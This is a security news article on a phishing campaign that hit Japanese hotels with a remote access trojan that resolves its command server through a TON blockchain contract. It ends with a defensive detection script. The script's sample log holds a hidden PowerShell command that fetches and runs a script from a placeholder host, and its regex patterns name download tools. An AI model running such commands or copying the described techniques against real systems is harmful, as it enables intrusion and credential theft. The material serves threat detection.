A new wave of cyberattacks targeting Japan’s hospitality sector has put the global threat landscape on high alert.
In late May 2026, attackers began sending phishing emails to Japanese partner companies of Booking.com, disguised as urgent guest complaints and review requests.
The goal was to trick hotel staff into opening malicious files that handed remote control of their systems to an attacker.
What makes this campaign alarming is how the malware operates. Instead of hardcoding a command-and-control server, the attackers used The Open Network (TON) blockchain as a “dead drop resolver,” a technique that lets them update the server address at any time without touching the malware itself.
This makes the infrastructure far harder to disrupt: blocking or sinkholing a single C2 domain does not sever the implant's link to its operators, because the next address is read from a public blockchain that defenders cannot take down. Analysts at Trend Micro identified the malware, naming it TONResolver, and confirmed it functions as a Remote Access Trojan (RAT).
Trend Micro said in a report shared with Cyber Security News (CSN) that infected endpoints remain in a persistent keepalive loop, staying connected and ready to receive attacker commands for as long as the infection is active. Telemetry confirmed Japan as the most heavily impacted region.
Two delivery methods were observed. The first was bulk phishing with subject lines such as “Important: Guest Stay Review Request.”
The second was a “conversational attack” through Gmail, where the attacker sent an innocent inquiry, waited for a reply, then followed up with a malicious link. Building trust before delivering the payload is a tactic commonly linked to advanced persistent threat groups.

The impact of a successful infection extends beyond the initial entry point. Once TONResolver runs, it collects the victim’s username, hostname, operating system, CPU count, memory, and MAC address.
Follow-on activity confirmed through managed detection and response analysis revealed credential theft attempts, with the malware targeting browser-stored passwords, cookies, history, and autofill data from Chrome and Edge.
TONResolver Malware Uses TON Smart Contracts
The defining technical feature of TONResolver is how it locates its command-and-control server. Rather than embedding a fixed address, the attackers stored the C2 domain inside a TON smart contract.
When the malware runs, it queries the contract's “get_domain” get-method through the public tonapi[.]io API and treats the returned value as the current live server address.
This gives attackers a critical advantage. If a C2 server is blocked or taken offline, they update the domain inside the TON contract and all infected machines automatically reconnect to the new server with no change to the malware itself.
Analysis of the contract's transaction history confirmed multiple C2 domain switches, showing the mechanism was actively used throughout the campaign rather than held in reserve.
The payload is a JavaScript file executed through Node.js, a legitimate and widely trusted runtime. VM-based obfuscation converts the logic into a custom virtual instruction set, so static analysis yields little until the interpreter itself is reverse engineered.

C2 traffic runs over WebSocket, with a session key negotiated via ECDH and message payloads encrypted with AES-256-CBC, so packet-level inspection reveals little beyond the connection itself; detection has to lean on endpoint behavior and destinations rather than payload content.
Infection Chain and Persistence Tactics
The attack begins when a victim clicks a hyperlink in the phishing email, downloading a zip archive from a malicious website.
Inside is a shortcut file (.LNK) disguised as a photo, and clicking it triggers a PowerShell command that fetches a PS1 script from the attacker’s server and launches the full infection chain.
The PS1 script deploys the JavaScript payload and silently downloads Node.js from nodejs.org to serve as the execution environment.
The malware sets a Windows registry Run key for persistence and uses a mutex check to prevent duplicate instances. This blend of malicious and legitimate behavior helps it evade many standard security tools.
Organizations should act without delay. Trend Micro recommends restricting connectivity to the TON platform, since blocking tonapi[.]io cuts the dead drop resolver link for the current build. Bear in mind that the contract state is public and can be read through any TON API gateway or node, so treat this as a containment step rather than a permanent fix.
Restricting PowerShell's ability to fetch files from the internet (for example through Constrained Language Mode, application control, or egress filtering for powershell.exe) and monitoring for Node.js executing from AppData paths are also strongly advised.
Reviewing configurations, strengthening endpoint monitoring, and refreshing incident response procedures are essential steps for organizations that could be targeted in this ongoing campaign.
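The hunting checks above can be expressed as a small correlation script. The following is an added example written for this article, not code from Trend Micro or from the malware; it runs over constructed, simplified Sysmon-like JSON events (the event shape, host names, pids, the defanged download domain and the placeholder contract address in the tonapi[.]io URL are all assumptions made for the example) and flags the four observable stages of the chain: a PowerShell download cradle, node.exe running from AppData, a Run key pointing at that node.exe, and a get_domain call to tonapi[.]io.

```python
import json
import re
from collections import defaultdict

# Constructed sample telemetry (simplified Sysmon-like JSON lines). This is an
# assumed format for the example, not real victim data or Trend Micro's schema.
# FRONTDESK-01 carries the whole chain; BACKOFFICE-02 is a benign developer box.
SAMPLE_EVENTS = r"""
{"ts":"2026-05-28T09:12:01Z","host":"FRONTDESK-01","type":"process","pid":4120,"ppid":3000,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\explorer.exe","cmdline":"powershell.exe -w hidden -c \"iwr hxxp://files[.]example[.]test/s.ps1 -OutFile $env:TEMP\\s.ps1; . $env:TEMP\\s.ps1\""}
{"ts":"2026-05-28T09:12:09Z","host":"FRONTDESK-01","type":"process","pid":4188,"ppid":4120,"image":"C:\\Users\\staff\\AppData\\Local\\node\\node.exe","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"node.exe C:\\Users\\staff\\AppData\\Local\\node\\app.js"}
{"ts":"2026-05-28T09:12:10Z","host":"FRONTDESK-01","type":"registry","pid":4188,"key":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\NodeUpdate","value":"C:\\Users\\staff\\AppData\\Local\\node\\node.exe C:\\Users\\staff\\AppData\\Local\\node\\app.js"}
{"ts":"2026-05-28T09:12:12Z","host":"FRONTDESK-01","type":"network","pid":4188,"dest_host":"tonapi.io","dest_port":443,"url":"/v2/blockchain/accounts/EQplaceholder/methods/get_domain"}
{"ts":"2026-05-28T09:30:00Z","host":"BACKOFFICE-02","type":"process","pid":900,"ppid":880,"image":"C:\\Program Files\\nodejs\\node.exe","parent_image":"C:\\Windows\\System32\\cmd.exe","cmdline":"node.exe build.js"}
{"ts":"2026-05-28T09:31:00Z","host":"BACKOFFICE-02","type":"network","pid":900,"dest_host":"registry.npmjs.org","dest_port":443,"url":"/lodash"}
"""

# Download cradle primitives commonly seen in PowerShell one-liners.
PS_DOWNLOAD = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer)", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
APPDATA_NODE = re.compile(r"\\AppData\\.*\\node\.exe$", re.I)  # node.exe under a user profile


def parse_events(text):
    """One JSON object per line; blank lines are ignored."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def match_rules(ev):
    """Return (rule_name, detail) pairs that a single event triggers."""
    hits = []
    kind = ev.get("type")
    if kind == "process":
        image, cmd = ev.get("image", ""), ev.get("cmdline", "")
        if image.lower().endswith("powershell.exe") and PS_DOWNLOAD.search(cmd):
            detail = "download cradle"
            if ev.get("parent_image", "").lower().endswith("explorer.exe"):
                detail += "; parent explorer.exe is consistent with a double-clicked .LNK"
            hits.append(("powershell_download", detail))
        if APPDATA_NODE.search(image):
            hits.append(("node_from_appdata", image))
    elif kind == "registry":
        if RUN_KEY.search(ev.get("key", "")) and "node.exe" in ev.get("value", "").lower():
            hits.append(("run_key_node", ev["key"]))
    elif kind == "network":
        host = ev.get("dest_host", "").lower()
        if host == "tonapi.io" or host.endswith(".tonapi.io"):
            detail = "TON API contact"
            if "get_domain" in ev.get("url", ""):
                detail += "; get_domain call matches dead drop resolution"
            hits.append(("ton_api_contact", detail))
    return hits


def triage(events):
    """Group rule hits per host: {host: {"rules": [...], "findings": [(ts, rule, pid, detail)]}}.
    Hosts with no hits are omitted."""
    report = defaultdict(lambda: {"rules": set(), "findings": []})
    for ev in sorted(events, key=lambda e: e["ts"]):
        for rule, detail in match_rules(ev):
            entry = report[ev["host"]]
            entry["rules"].add(rule)
            entry["findings"].append((ev["ts"], rule, ev.get("pid"), detail))
    return {h: {"rules": sorted(v["rules"]), "findings": v["findings"]} for h, v in report.items()}


def suspected_hosts(report, min_rules=2):
    """Hosts on which at least min_rules distinct stages fired, most stages first."""
    return sorted((h for h, v in report.items() if len(v["rules"]) >= min_rules),
                  key=lambda h: -len(report[h]["rules"]))


def linked_chain(events):
    """(powershell_pid, node_pid) pairs where node.exe from AppData was spawned
    directly by a PowerShell process that matched the download rule."""
    flagged_ps = {ev["pid"] for ev in events
                  if any(r == "powershell_download" for r, _ in match_rules(ev))}
    return [(ev["ppid"], ev["pid"]) for ev in events
            if ev.get("type") == "process" and ev.get("ppid") in flagged_ps
            and any(r == "node_from_appdata" for r, _ in match_rules(ev))]


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    report = triage(events)
    for host in suspected_hosts(report):
        print(host, report[host]["rules"])
        for ts, rule, pid, detail in report[host]["findings"]:
            print(f"  {ts} pid={pid} {rule}: {detail}")
    print("linked chains:", linked_chain(events))
```

On the sample data only FRONTDESK-01 is reported, with all four stages and the PowerShell-to-node.exe parent link intact; the developer machine running Node.js from Program Files and talking to npm produces no findings. In production, feed the same rules with real Sysmon, EDR or proxy events and raise the threshold in suspected_hosts to suit your environment's baseline of legitimate Node.js use.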
Indicators of Compromise (IoCs):
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.